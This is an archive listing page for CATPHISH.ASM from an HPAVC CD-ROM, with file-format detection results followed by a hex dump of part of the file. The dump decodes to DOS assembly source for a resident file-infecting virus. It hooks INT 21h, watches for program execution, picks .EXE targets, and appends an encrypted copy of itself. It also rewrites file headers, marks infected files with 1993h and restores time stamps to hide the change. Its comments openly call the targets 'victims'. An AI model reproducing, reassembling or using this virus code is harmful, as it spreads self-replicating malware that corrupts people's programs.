/ HPAVC / HPAVC CD-ROM.iso / pc / SOURCE.ZIP / CATPHISH.ASM
Mailbox/MIME Entity  |  1995-10-29  |  13.3 KB

This file was processed as: Mailbox/MIME Entity (archive/mbox).

You can browse this item here: CATPHISH.ASM

Confidence | Program | Detection | Match Type | Support
100% | dexvert | Mailbox/MIME Entity (archive/mbox) | magic | Supported
100% | dexvert | Internet Message Format (text/imf) | magic | Supported
100% | dexvert | Assembly Source File (text/asm) | magic | Supported
1% | dexvert | Text File (text/txt) | fallback | Supported
100% | file | Mailbox text, 1st line "From smtp Sun Jan 29 16:25 EST 1995", ISO-8859 text | default |
100% | TrID | E-Mail message (Var. 2) | default |
100% | perlTextCheck | Likely Text (Perl) | default |
100% | siegfried | x-fmt/111 Plain Text File | default |
100% | detectItEasy | Format: plain text[LF] | default (weak) |
100% | xdgMime | application/mbox | default |



hex view
|00001af0| 20 20 20 70 6f 69 6e 74 | 20 74 6f 20 76 69 72 75 | point| to viru|
|00001b00| 73 20 63 6f 64 65 20 69 | 6e 0a 20 20 20 20 20 20 |s code i|n. |
|00001b10| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001b20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001b30| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 20 20 | | ; |
|00001b40| 6d 65 6d 6f 72 79 2e 0a | 20 20 20 20 20 20 20 20 |memory..| |
|00001b50| 6d 6f 76 20 61 78 2c 32 | 35 32 31 68 0a 20 20 20 |mov ax,2|521h. |
|00001b60| 20 20 20 20 20 6d 6f 76 | 20 64 78 2c 6f 66 66 73 | mov| dx,offs|
|00001b70| 65 74 20 76 69 72 75 73 | 5f 61 74 74 61 63 6b 2d |et virus|_attack-|
|00001b80| 31 30 30 68 0a 20 20 20 | 20 20 20 20 20 70 75 73 |100h. | pus|
|00001b90| 68 20 65 73 0a 20 20 20 | 20 20 20 20 20 70 6f 70 |h es. | pop|
|00001ba0| 20 64 73 0a 20 20 20 20 | 20 20 20 20 69 6e 74 20 | ds. | int |
|00001bb0| 32 31 68 0a 0a 0a 0a 0a | 20 20 20 20 20 20 20 20 |21h.....| |
|00001bc0| 70 6f 70 20 64 73 0a 0a | 0a 0a 65 78 69 74 5f 6e |pop ds..|..exit_n|
|00001bd0| 6f 72 6d 61 6c 3a 20 20 | 20 20 20 20 20 20 20 20 |ormal: | |
|00001be0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001bf0| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 52 65 | | ; Re|
|00001c00| 74 75 72 6e 20 63 6f 6e | 74 72 6f 6c 20 74 6f 0a |turn con|trol to.|
|00001c10| 20 20 20 20 20 20 20 20 | 70 6f 70 20 65 73 20 20 | |pop es |
|00001c20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001c30| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001c40| 20 20 3b 20 20 20 69 6e | 66 65 63 74 65 64 20 2e | ; in|fected .|
|00001c50| 45 58 45 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |EXE. | mov |
|00001c60| 61 78 2c 20 65 73 20 20 | 20 20 20 20 20 20 20 20 |ax, es | |
|00001c70| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001c80| 20 20 20 20 20 20 3b 20 | 20 20 28 44 61 72 6b 20 | ; | (Dark |
|00001c90| 41 6e 67 6c 65 20 63 6f | 64 65 2e 29 0a 20 20 20 |Angle co|de.). |
|00001ca0| 20 20 20 20 20 61 64 64 | 20 61 78 2c 20 31 30 68 | add| ax, 10h|
|00001cb0| 0a 20 20 20 20 20 20 20 | 20 61 64 64 20 77 6f 72 |. | add wor|
|00001cc0| 64 20 70 74 72 20 63 73 | 3a 5b 62 70 2b 4f 72 69 |d ptr cs|:[bp+Ori|
|00001cd0| 67 43 53 49 50 2b 32 2d | 31 30 30 68 5d 2c 20 61 |gCSIP+2-|100h], a|
|00001ce0| 78 0a 0a 20 20 20 20 20 | 20 20 20 63 6c 69 0a 20 |x.. | cli. |
|00001cf0| 20 20 20 20 20 20 20 61 | 64 64 20 61 78 2c 20 77 | a|dd ax, w|
|00001d00| 6f 72 64 20 70 74 72 20 | 63 73 3a 5b 62 70 2b 4f |ord ptr |cs:[bp+O|
|00001d10| 72 69 67 53 53 53 50 2b | 32 2d 31 30 30 68 5d 0a |rigSSSP+|2-100h].|
|00001d20| 20 20 20 20 20 20 20 20 | 6d 6f 76 20 73 73 2c 20 | |mov ss, |
|00001d30| 61 78 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 73 |ax. | mov s|
|00001d40| 70 2c 20 77 6f 72 64 20 | 70 74 72 20 63 73 3a 5b |p, word |ptr cs:[|
|00001d50| 62 70 2b 4f 72 69 67 53 | 53 53 50 2d 31 30 30 68 |bp+OrigS|SSP-100h|
|00001d60| 5d 0a 20 20 20 20 20 20 | 20 20 73 74 69 0a 0a 20 |]. | sti.. |
|00001d70| 20 20 20 20 20 20 20 78 | 6f 72 20 61 78 2c 61 78 | x|or ax,ax|
|00001d80| 0a 20 20 20 20 20 20 20 | 20 78 6f 72 20 62 70 2c |. | xor bp,|
|00001d90| 62 70 0a 0a 65 6e 64 63 | 72 79 70 74 20 20 6c 61 |bp..endc|rypt la|
|00001da0| 62 65 6c 20 20 62 79 74 | 65 0a 0a 20 20 20 20 20 |bel byt|e.. |
|00001db0| 20 20 20 64 62 20 30 65 | 61 68 0a 4f 72 69 67 43 | db 0e|ah.OrigC|
|00001dc0| 53 49 50 20 64 64 20 30 | 66 66 66 30 30 30 30 30 |SIP dd 0|fff00000|
|00001dd0| 68 0a 4f 72 69 67 53 53 | 53 50 20 64 64 20 3f 0a |h.OrigSS|SP dd ?.|
|00001de0| 0a 65 78 65 5f 61 74 74 | 72 69 62 20 64 77 20 3f |.exe_att|rib dw ?|
|00001df0| 0a 64 61 74 65 5f 73 74 | 61 6d 70 20 64 77 20 3f |.date_st|amp dw ?|
|00001e00| 0a 74 69 6d 65 5f 73 74 | 61 6d 70 20 64 77 20 3f |.time_st|amp dw ?|
|00001e10| 0a 0a 0a 0a 64 6f 73 5f | 76 65 63 74 6f 72 20 64 |....dos_|vector d|
|00001e20| 64 20 3f 0a 0a 62 75 66 | 66 65 72 20 64 62 20 31 |d ?..buf|fer db 1|
|00001e30| 38 68 20 64 75 70 28 3f | 29 20 20 20 20 20 20 20 |8h dup(?|) |
|00001e40| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001e50| 20 20 20 20 20 20 20 3b | 20 2e 45 58 45 20 68 65 | ;| .EXE he|
|00001e60| 61 64 65 72 20 62 75 66 | 66 65 72 2e 0a 0a 0a 0a |ader buf|fer.....|
|00001e70| 0a 3b 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |.;------|--------|
|00001e80| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001e90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001ea0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001eb0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 0a 0a |--------|------..|
|00001ec0| 0a 76 69 72 75 73 5f 61 | 74 74 61 63 6b 20 70 72 |.virus_a|ttack pr|
|00001ed0| 6f 63 20 20 66 61 72 0a | 20 20 20 20 20 20 20 20 |oc far.| |
|00001ee0| 20 20 20 20 20 20 20 61 | 73 73 75 6d 65 20 63 73 | a|ssume cs|
|00001ef0| 3a 63 6f 64 65 2c 64 73 | 3a 6e 6f 74 68 69 6e 67 |:code,ds|:nothing|
|00001f00| 2c 20 65 73 3a 6e 6f 74 | 68 69 6e 67 0a 0a 0a 20 |, es:not|hing... |
|00001f10| 20 20 20 20 20 20 20 63 | 6d 70 20 61 78 2c 34 62 | c|mp ax,4b|
|00001f20| 30 30 68 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |00h | |
|00001f30| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001f40| 20 3b 20 49 6e 66 65 63 | 74 20 6f 6e 6c 79 20 6f | ; Infec|t only o|
|00001f50| 6e 20 66 69 6c 65 0a 20 | 20 20 20 20 20 20 20 6a |n file. | j|
|00001f60| 7a 20 72 75 6e 5f 6b 69 | 6c 6c 20 20 20 20 20 20 |z run_ki|ll |
|00001f70| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001f80| 20 20 20 20 20 20 20 20 | 20 3b 20 20 20 65 78 65 | | ; exe|
|00001f90| 63 75 74 69 6f 6e 73 2e | 0a 0a 6c 65 61 76 65 5f |cutions.|..leave_|
|00001fa0| 76 69 72 75 73 3a 0a 20 | 20 20 20 20 20 20 20 6a |virus:. | j|
|00001fb0| 6d 70 20 64 77 6f 72 64 | 20 70 74 72 20 63 73 3a |mp dword| ptr cs:|
|00001fc0| 5b 64 6f 73 5f 76 65 63 | 74 6f 72 2d 31 30 30 68 |[dos_vec|tor-100h|
|00001fd0| 5d 0a 0a 0a 0a 72 75 6e | 5f 6b 69 6c 6c 3a 0a 20 |]....run|_kill:. |
|00001fe0| 20 20 20 20 20 20 20 63 | 61 6c 6c 20 69 6e 66 65 | c|all infe|
|00001ff0| 63 74 65 78 65 0a 20 20 | 20 20 20 20 20 20 6a 6d |ctexe. | jm|
|00002000| 70 20 6c 65 61 76 65 5f | 76 69 72 75 73 0a 0a 0a |p leave_|virus...|
|00002010| 0a 0a 0a 69 6e 66 65 63 | 74 65 78 65 3a 20 20 20 |...infec|texe: |
|00002020| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002030| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002040| 20 20 20 20 20 3b 20 53 | 61 6d 65 20 6f 6c 64 20 | ; S|ame old |
|00002050| 77 6f 72 6b 69 6e 67 20 | 68 6f 72 73 65 0a 20 20 |working |horse. |
|00002060| 20 20 20 20 20 20 70 75 | 73 68 20 61 78 20 20 20 | pu|sh ax |
|00002070| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002080| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002090| 3b 20 20 20 72 6f 75 74 | 69 6e 65 20 74 68 61 74 |; rout|ine that|
|000020a0| 20 69 6e 66 65 63 74 73 | 0a 20 20 20 20 20 20 20 | infects|. |
|000020b0| 20 70 75 73 68 20 62 78 | 20 20 20 20 20 20 20 20 | push bx| |
|000020c0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000020d0| 20 20 20 20 20 20 20 20 | 20 20 20 3b 20 20 20 74 | | ; t|
|000020e0| 68 65 20 73 65 6c 65 63 | 74 65 64 20 66 69 6c 65 |he selec|ted file|
|000020f0| 2e 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 63 |.. | push c|
|00002100| 78 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 65 |x. | push e|
|00002110| 73 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 64 |s. | push d|
|00002120| 78 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 64 |x. | push d|
|00002130| 73 0a 0a 0a 0a 20 20 20 | 20 20 20 20 20 6d 6f 76 |s.... | mov|
|00002140| 20 63 78 2c 36 34 64 0a | 20 20 20 20 20 20 20 20 | cx,64d.| |
|00002150| 6d 6f 76 20 62 78 2c 64 | 78 0a 0a 66 69 6e 64 6e |mov bx,d|x..findn|
|00002160| 61 6d 65 3a 0a 20 20 20 | 20 20 20 20 20 63 6d 70 |ame:. | cmp|
|00002170| 20 62 79 74 65 20 70 74 | 72 20 64 73 3a 5b 62 78 | byte pt|r ds:[bx|
|00002180| 5d 2c 27 2e 27 0a 20 20 | 20 20 20 20 20 20 6a 7a |],'.'. | jz|
|00002190| 20 6f 5f 6b 0a 20 20 20 | 20 20 20 20 20 69 6e 63 | o_k. | inc|
|000021a0| 20 62 78 0a 20 20 20 20 | 20 20 20 20 6c 6f 6f 70 | bx. | loop|
|000021b0| 20 66 69 6e 64 6e 61 6d | 65 0a 0a 70 72 65 5f 67 | findnam|e..pre_g|
|000021c0| 65 74 5f 6f 75 74 3a 0a | 20 20 20 20 20 20 20 20 |et_out:.| |
|000021d0| 6a 6d 70 20 67 65 74 5f | 6f 75 74 0a 0a 6f 5f 6b |jmp get_|out..o_k|
|000021e0| 3a 0a 20 20 20 20 20 20 | 20 20 63 6d 70 20 62 79 |:. | cmp by|
|000021f0| 74 65 20 70 74 72 20 64 | 73 3a 5b 62 78 2b 31 5d |te ptr d|s:[bx+1]|
|00002200| 2c 27 45 27 20 20 20 20 | 20 20 20 20 20 20 20 20 |,'E' | |
|00002210| 20 20 20 20 3b 20 53 65 | 61 72 63 68 65 73 20 66 | ; Se|arches f|
|00002220| 6f 72 20 76 69 63 74 69 | 6d 73 2e 0a 20 20 20 20 |or victi|ms.. |
|00002230| 20 20 20 20 6a 6e 7a 20 | 70 72 65 5f 67 65 74 5f | jnz |pre_get_|
|00002240| 6f 75 74 0a 20 20 20 20 | 20 20 20 20 63 6d 70 20 |out. | cmp |
|00002250| 62 79 74 65 20 70 74 72 | 20 64 73 3a 5b 62 78 2b |byte ptr| ds:[bx+|
|00002260| 32 5d 2c 27 58 27 0a 20 | 20 20 20 20 20 20 20 6a |2],'X'. | j|
|00002270| 6e 7a 20 70 72 65 5f 67 | 65 74 5f 6f 75 74 0a 20 |nz pre_g|et_out. |
|00002280| 20 20 20 20 20 20 20 63 | 6d 70 20 62 79 74 65 20 | c|mp byte |
|00002290| 70 74 72 20 64 73 3a 5b | 62 78 2b 33 5d 2c 27 45 |ptr ds:[|bx+3],'E|
|000022a0| 27 0a 20 20 20 20 20 20 | 20 20 6a 6e 7a 20 70 72 |'. | jnz pr|
|000022b0| 65 5f 67 65 74 5f 6f 75 | 74 0a 0a 0a 0a 0a 67 65 |e_get_ou|t.....ge|
|000022c0| 74 65 78 65 3a 0a 20 20 | 20 20 20 20 20 20 6d 6f |texe:. | mo|
|000022d0| 76 20 61 78 2c 34 33 30 | 30 68 0a 20 20 20 20 20 |v ax,430|0h. |
|000022e0| 20 20 20 63 61 6c 6c 20 | 64 6f 73 69 74 0a 0a 20 | call |dosit.. |
|000022f0| 20 20 20 20 20 20 20 6d | 6f 76 20 77 6f 72 64 20 | m|ov word |
|00002300| 70 74 72 20 63 73 3a 5b | 65 78 65 5f 61 74 74 72 |ptr cs:[|exe_attr|
|00002310| 69 62 2d 31 30 30 68 5d | 2c 63 78 0a 0a 20 20 20 |ib-100h]|,cx.. |
|00002320| 20 20 20 20 20 6d 6f 76 | 20 61 78 2c 34 33 30 31 | mov| ax,4301|
|00002330| 68 0a 20 20 20 20 20 20 | 20 20 78 6f 72 20 63 78 |h. | xor cx|
|00002340| 2c 63 78 0a 20 20 20 20 | 20 20 20 20 63 61 6c 6c |,cx. | call|
|00002350| 20 64 6f 73 69 74 0a 0a | 65 78 65 5f 6b 69 6c 6c | dosit..|exe_kill|
|00002360| 3a 0a 20 20 20 20 20 20 | 20 20 6d 6f 76 20 61 78 |:. | mov ax|
|00002370| 2c 33 64 30 32 68 0a 20 | 20 20 20 20 20 20 20 63 |,3d02h. | c|
|00002380| 61 6c 6c 20 64 6f 73 69 | 74 0a 20 20 20 20 20 20 |all dosi|t. |
|00002390| 20 20 78 63 68 67 20 62 | 78 2c 61 78 0a 0a 20 20 | xchg b|x,ax.. |
|000023a0| 20 20 20 20 20 20 6d 6f | 76 20 61 78 2c 35 37 30 | mo|v ax,570|
|000023b0| 30 68 0a 20 20 20 20 20 | 20 20 20 63 61 6c 6c 20 |0h. | call |
|000023c0| 64 6f 73 69 74 0a 0a 20 | 20 20 20 20 20 20 20 6d |dosit.. | m|
|000023d0| 6f 76 20 77 6f 72 64 20 | 70 74 72 20 63 73 3a 5b |ov word |ptr cs:[|
|000023e0| 74 69 6d 65 5f 73 74 61 | 6d 70 2d 31 30 30 68 5d |time_sta|mp-100h]|
|000023f0| 2c 63 78 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |,cx. | mov |
|00002400| 77 6f 72 64 20 70 74 72 | 20 63 73 3a 5b 64 61 74 |word ptr| cs:[dat|
|00002410| 65 5f 73 74 61 6d 70 2d | 31 30 30 68 5d 2c 64 78 |e_stamp-|100h],dx|
|00002420| 0a 0a 0a 0a 20 20 20 20 | 20 20 20 20 70 75 73 68 |.... | push|
|00002430| 20 63 73 0a 20 20 20 20 | 20 20 20 20 70 6f 70 20 | cs. | pop |
|00002440| 64 73 0a 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |ds.. | mov |
|00002450| 61 68 2c 33 66 68 0a 20 | 20 20 20 20 20 20 20 6d |ah,3fh. | m|
|00002460| 6f 76 20 63 78 2c 31 38 | 68 0a 20 20 20 20 20 20 |ov cx,18|h. |
|00002470| 20 20 6d 6f 76 20 64 78 | 2c 6f 66 66 73 65 74 20 | mov dx|,offset |
|00002480| 62 75 66 66 65 72 2d 31 | 30 30 68 0a 20 20 20 20 |buffer-1|00h. |
|00002490| 20 20 20 20 63 61 6c 6c | 20 64 6f 73 69 74 0a 0a | call| dosit..|
|000024a0| 20 20 20 20 20 20 20 20 | 63 6d 70 20 77 6f 72 64 | |cmp word|
|000024b0| 20 70 74 72 20 63 73 3a | 5b 62 75 66 66 65 72 2b | ptr cs:|[buffer+|
|000024c0| 31 32 68 2d 31 30 30 68 | 5d 2c 31 39 39 33 68 20 |12h-100h|],1993h |
|000024d0| 20 20 3b 20 4c 6f 6f 6b | 73 20 66 6f 72 20 76 69 | ; Look|s for vi|
|000024e0| 72 75 73 20 6d 61 72 6b | 65 72 0a 20 20 20 20 20 |rus mark|er. |
|000024f0| 20 20 20 6a 6e 7a 20 69 | 6e 66 65 63 74 66 6f 72 | jnz i|nfectfor|
|00002500| 73 75 72 65 20 20 20 20 | 20 20 20 20 20 20 20 20 |sure | |
|00002510| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 3b 20 20 | | ; |
|00002520| 20 6f 66 20 31 39 39 33 | 68 20 69 6e 20 2e 45 58 | of 1993|h in .EX|
|00002530| 45 0a 20 20 20 20 20 20 | 20 20 6a 6d 70 20 63 6c |E. | jmp cl|
|00002540| 6f 73 65 5f 69 74 20 20 | 20 20 20 20 20 20 20 20 |ose_it | |
|00002550| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002560| 20 20 20 20 3b 20 20 20 | 68 65 61 64 65 72 20 63 | ; |header c|
|00002570| 68 65 63 6b 73 75 6d 0a | 20 20 20 20 20 20 20 20 |hecksum.| |
|00002580| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002590| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000025a0| 20 20 20 20 20 20 20 20 | 20 20 3b 20 20 20 70 6f | | ; po|
|000025b0| 73 69 74 69 6f 6e 2e 0a | 69 6e 66 65 63 74 66 6f |sition..|infectfo|
|000025c0| 72 73 75 72 65 3a 0a 20 | 20 20 20 20 20 20 20 63 |rsure:. | c|
|000025d0| 61 6c 6c 20 6d 6f 76 65 | 5f 66 5f 70 74 72 66 61 |all move|_f_ptrfa|
|000025e0| 72 0a 0a 20 20 20 20 20 | 20 20 20 70 75 73 68 20 |r.. | push |
|000025f0| 61 78 0a 20 20 20 20 20 | 20 20 20 70 75 73 68 20 |ax. | push |
|00002600| 64 78 0a 0a 0a 20 20 20 | 20 20 20 20 20 63 61 6c |dx... | cal|
|00002610| 6c 20 73 74 6f 72 65 5f | 68 65 61 64 65 72 0a 0a |l store_|header..|
|00002620| 20 20 20 20 20 20 20 20 | 70 6f 70 20 64 78 0a 20 | |pop dx. |
|00002630| 20 20 20 20 20 20 20 70 | 6f 70 20 61 78 0a 0a 20 | p|op ax.. |
|00002640| 20 20 20 20 20 20 20 63 | 61 6c 6c 20 69 6e 66 65 | c|all infe|
|00002650| 63 74 5f 68 65 61 64 65 | 72 0a 0a 0a 20 20 20 20 |ct_heade|r... |
|00002660| 20 20 20 20 70 75 73 68 | 20 62 78 0a 20 20 20 20 | push| bx. |
|00002670| 20 20 20 20 70 75 73 68 | 20 63 78 0a 20 20 20 20 | push| cx. |
|00002680| 20 20 20 20 70 75 73 68 | 20 64 78 0a 0a 0a 20 20 | push| dx... |
|00002690| 20 20 20 20 20 20 6d 6f | 76 20 62 78 2c 6f 66 66 | mo|v bx,off|
|000026a0| 73 65 74 20 69 6e 66 65 | 63 74 5f 68 65 61 64 65 |set infe|ct_heade|
|000026b0| 72 2d 31 30 30 68 0a 20 | 20 20 20 20 20 20 20 6d |r-100h. | m|
|000026c0| 6f 76 20 63 78 2c 28 65 | 6e 64 63 72 79 70 74 29 |ov cx,(e|ndcrypt)|
|000026d0| 2d 28 69 6e 66 65 63 74 | 5f 68 65 61 64 65 72 29 |-(infect|_header)|
|000026e0| 0a 0a 72 6f 6c 5f 65 6d | 3a 20 20 20 20 20 20 20 |..rol_em|: |
|000026f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002700| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002710| 20 20 20 20 3b 20 45 6e | 63 72 79 70 74 69 6f 6e | ; En|cryption|
|00002720| 20 76 69 61 0a 20 20 20 | 20 20 20 20 20 6d 6f 76 | via. | mov|
|00002730| 20 64 6c 2c 62 79 74 65 | 20 70 74 72 20 63 73 3a | dl,byte| ptr cs:|
|00002740| 5b 62 78 5d 20 20 20 20 | 20 20 20 20 20 20 20 20 |[bx] | |
|00002750| 20 20 20 20 20 20 20 3b | 20 20 20 72 6f 74 61 74 | ;| rotat|
|00002760| 69 6e 67 20 6c 65 66 74 | 2e 0a 20 20 20 20 20 20 |ing left|.. |
|00002770| 20 20 72 6f 6c 20 64 6c | 2c 31 0a 20 20 20 20 20 | rol dl|,1. |
|00002780| 20 20 20 6d 6f 76 20 62 | 79 74 65 20 70 74 72 20 | mov b|yte ptr |
|00002790| 63 73 3a 5b 62 78 5d 2c | 64 6c 0a 20 20 20 20 20 |cs:[bx],|dl. |
|000027a0| 20 20 20 69 6e 63 20 62 | 78 0a 20 20 20 20 20 20 | inc b|x. |
|000027b0| 20 20 6c 6f 6f 70 20 72 | 6f 6c 5f 65 6d 0a 0a 20 | loop r|ol_em.. |
|000027c0| 20 20 20 20 20 20 20 70 | 6f 70 20 64 78 0a 20 20 | p|op dx. |
|000027d0| 20 20 20 20 20 20 70 6f | 70 20 63 78 0a 20 20 20 | po|p cx. |
|000027e0| 20 20 20 20 20 70 6f 70 | 20 62 78 0a 0a 20 20 20 | pop| bx.. |
|000027f0| 20 20 20 20 20 6d 6f 76 | 20 61 68 2c 34 30 68 0a | mov| ah,40h.|
|00002800| 20 20 20 20 20 20 20 20 | 6d 6f 76 20 63 78 2c 65 | |mov cx,e|
|00002810| 6e 64 63 6f 64 65 2d 73 | 74 61 72 74 0a 20 20 20 |ndcode-s|tart. |
|00002820| 20 20 20 20 20 6d 6f 76 | 20 64 78 2c 6f 66 66 73 | mov| dx,offs|
|00002830| 65 74 20 73 74 61 72 74 | 2d 31 30 30 68 0a 20 20 |et start|-100h. |
|00002840| 20 20 20 20 20 20 63 61 | 6c 6c 20 64 6f 73 69 74 | ca|ll dosit|
|00002850| 0a 0a 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 77 |... | mov w|
|00002860| 6f 72 64 20 70 74 72 20 | 63 73 3a 5b 62 75 66 66 |ord ptr |cs:[buff|
|00002870| 65 72 2b 31 32 68 2d 31 | 30 30 68 5d 2c 31 39 39 |er+12h-1|00h],199|
|00002880| 33 68 0a 0a 0a 20 20 20 | 20 20 20 20 20 63 61 6c |3h... | cal|
|00002890| 6c 20 6d 6f 76 65 5f 66 | 5f 70 74 72 63 6c 6f 73 |l move_f|_ptrclos|
|000028a0| 65 0a 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 61 |e.. | mov a|
|000028b0| 68 2c 34 30 68 0a 20 20 | 20 20 20 20 20 20 6d 6f |h,40h. | mo|
|000028c0| 76 20 63 78 2c 31 38 68 | 0a 20 20 20 20 20 20 20 |v cx,18h|. |
|000028d0| 20 6d 6f 76 20 64 78 2c | 6f 66 66 73 65 74 20 62 | mov dx,|offset b|
|000028e0| 75 66 66 65 72 2d 31 30 | 30 68 0a 20 20 20 20 20 |uffer-10|0h. |
|000028f0| 20 20 20 63 61 6c 6c 20 | 64 6f 73 69 74 0a 0a 20 | call |dosit.. |
|00002900| 20 20 20 20 20 20 20 6d | 6f 76 20 61 78 2c 35 37 | m|ov ax,57|
|00002910| 30 31 68 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |01h. | mov |
|00002920| 63 78 2c 77 6f 72 64 20 | 70 74 72 20 63 73 3a 5b |cx,word |ptr cs:[|
|00002930| 74 69 6d 65 5f 73 74 61 | 6d 70 2d 31 30 30 68 5d |time_sta|mp-100h]|
|00002940| 0a 20 20 20 20 20 20 20 | 20 6d 6f 76 20 64 78 2c |. | mov dx,|
|00002950| 77 6f 72 64 20 70 74 72 | 20 63 73 3a 5b 64 61 74 |word ptr| cs:[dat|
|00002960| 65 5f 73 74 61 6d 70 2d | 31 30 30 68 5d 0a 20 20 |e_stamp-|100h]. |
|00002970| 20 20 20 20 20 20 63 61 | 6c 6c 20 64 6f 73 69 74 | ca|ll dosit|
|00002980| 0a 0a 63 6c 6f 73 65 5f | 69 74 3a 0a 0a 0a 20 20 |..close_|it:... |
|00002990| 20 20 20 20 20 20 6d 6f | 76 20 61 68 2c 33 65 68 | mo|v ah,3eh|
|000029a0| 0a 20 20 20 20 20 20 20 | 20 63 61 6c 6c 20 64 6f |. | call do|
|000029b0| 73 69 74 0a 0a 67 65 74 | 5f 6f 75 74 3a 0a 0a 0a |sit..get|_out:...|
|000029c0| 20 20 20 20 20 20 20 20 | 70 6f 70 20 64 73 0a 20 | |pop ds. |
|000029d0| 20 20 20 20 20 20 20 70 | 6f 70 20 64 78 0a 0a 73 | p|op dx..s|
|000029e0| 65 74 5f 61 74 74 72 69 | 62 3a 0a 20 20 20 20 20 |et_attri|b:. |
|000029f0| 20 20 20 6d 6f 76 20 61 | 78 2c 34 33 30 31 68 0a | mov a|x,4301h.|
|00002a00| 20 20 20 20 20 20 20 20 | 6d 6f 76 20 63 78 2c 77 | |mov cx,w|
|00002a10| 6f 72 64 20 70 74 72 20 | 63 73 3a 5b 65 78 65 5f |ord ptr |cs:[exe_|
|00002a20| 61 74 74 72 69 62 2d 31 | 30 30 68 5d 0a 20 20 20 |attrib-1|00h]. |
|00002a30| 20 20 20 20 20 63 61 6c | 6c 20 64 6f 73 69 74 0a | cal|l dosit.|
|00002a40| 0a 0a 20 20 20 20 20 20 | 20 20 70 6f 70 20 65 73 |.. | pop es|
|00002a50| 0a 20 20 20 20 20 20 20 | 20 70 6f 70 20 63 78 0a |. | pop cx.|
|00002a60| 20 20 20 20 20 20 20 20 | 70 6f 70 20 62 78 0a 20 | |pop bx. |
|00002a70| 20 20 20 20 20 20 20 70 | 6f 70 20 61 78 0a 0a 20 | p|op ax.. |
|00002a80| 20 20 20 20 20 20 20 72 | 65 74 6e 0a 0a 3b 2d 2d | r|etn..;--|
|00002a90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002aa0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002ab0| 20 43 61 6c 6c 20 74 6f | 20 44 4f 53 20 69 6e 74 | Call to| DOS int|
|00002ac0| 20 32 31 68 20 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d | 21h ---|--------|
|00002ad0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 0a 0a 64 6f 73 69 |--------|--..dosi|
|00002ae0| 74 3a 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |t: | |
|00002af0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002b00| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 3b 20 | | ; |
|00002b10| 44 4f 53 20 66 75 6e 63 | 74 69 6f 6e 20 63 61 6c |DOS func|tion cal|
|00002b20| 6c 20 63 6f 64 65 2e 0a | 20 20 20 20 20 20 20 20 |l code..| |
|00002b30| 70 75 73 68 66 0a 20 20 | 20 20 20 20 20 20 63 61 |pushf. | ca|
|00002b40| 6c 6c 20 64 77 6f 72 64 | 20 70 74 72 20 63 73 3a |ll dword| ptr cs:|
|00002b50| 5b 64 6f 73 5f 76 65 63 | 74 6f 72 2d 31 30 30 68 |[dos_vec|tor-100h|
|00002b60| 5d 0a 20 20 20 20 20 20 | 20 20 72 65 74 6e 0a 0a |]. | retn..|
|00002b70| 3b 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |;-------|--------|
|00002b80| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002b90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
